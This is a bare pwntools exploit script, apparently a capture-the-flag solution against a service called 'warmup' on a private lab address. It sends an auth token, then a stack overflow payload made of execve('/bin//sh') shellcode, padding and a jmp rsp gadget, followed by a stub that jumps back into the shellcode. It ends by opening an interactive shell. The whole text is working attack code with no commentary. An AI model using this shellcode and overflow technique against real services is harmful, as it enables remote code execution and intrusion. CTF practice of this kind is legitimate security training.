0x0000000000400605 : jmp rsp


from pwn import *
auth='<deleted>'


sh=remote("10.214.10.18",10085)

sh.recvrepeat(timeout = 1)
sh.sendline(auth)


#sh=process('./warmup')



sh.recvrepeat(timeout = 1)

jmp_rsp=0x00400605

shellcode='\x50\x48\x31\xD2\x48\x31\xF6\x48\xBB\x2F\x62\x69\x6E\x2F\x2F\x73\x68\x53\x54\x5F\xB0\x3B\x0F\x05'

payload = flat([shellcode,'A' * (0x8+0x50-len(shellcode)), jmp_rsp,0x0])

payload = payload+'\x48\x83\xEC\x60\xFF\xE4'

sh.sendline(payload)

sh.recvrepeat(timeout = 1)

sh.interactive()
